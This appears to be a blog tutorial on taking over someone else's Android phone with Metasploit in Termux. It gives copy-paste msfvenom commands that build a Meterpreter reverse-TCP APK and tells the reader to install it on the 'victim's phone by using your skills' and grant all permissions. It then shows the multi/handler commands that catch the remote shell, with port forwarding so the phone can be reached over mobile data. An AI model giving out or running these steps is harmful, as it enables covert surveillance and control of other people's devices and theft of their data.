Before we know How To Hack Android Phone Must read this.
To Know How To Hack Android Phone using Metasploit is more than just a Termux tool. It’s a collection of hacking tools, I would call Metasploit an infrastructure that you can use to build your tools.
This free tool is one of the most popular tools in the field of information security, allowing you to find vulnerabilities on various platforms.
Metasploit has support for over 300,000 users and staff to help you get the information you need and identify vulnerabilities in your system.
This tool will allow you to simulate real hacking attack to identify vulnerabilities.
Metasploit is supported on all major platforms. Also you can install Metasploit in Termux also.
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How to Hack any Android using Termux with Metasploit.
In this post, we will learn how to hack Android phones using Termux with Metasploit. You can copy-paste the commands one by one in the Termux app and it will work perfectly.
The payload will be an APK file that we are going to install on the victim's phone. This will allow us to access the victim's Android phone.
Table of Contents
If You Dont know how to install Metasploit in Termux then visit this below article.
Step 1:
Open a new session in Termux (simply swipe your screen from left to right and click New Session). Please make sure Termux has storage permissions. If you do not have storage permission then type the command below.
You can skip this step if you want to use Metasploit over LAN (if you and your victim are connected to the same WiFi then you can skip this step).
With the help of port forwarding, we can access the victim's phone using mobile data, which means if you are using a SIM card then you have to do port forwarding to use Metasploit.
Commands to create metasploit payload in android termux.
Copy and paste below codes in Termux.
msfvenom -p android/meterpreter/reverse_tcp lhost= lport=1111 R > /sdcard/test.apk
Now check your phones internal storage. You will see a new apk file "test.apk"
This apk is your payload you can install this in your victim's phone by using your skills.
Allow all the permissions asking by the app.
That's come to the Termux.
Now copy and paste below 👇 commands to access your Metasploit console.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost
set lport 1111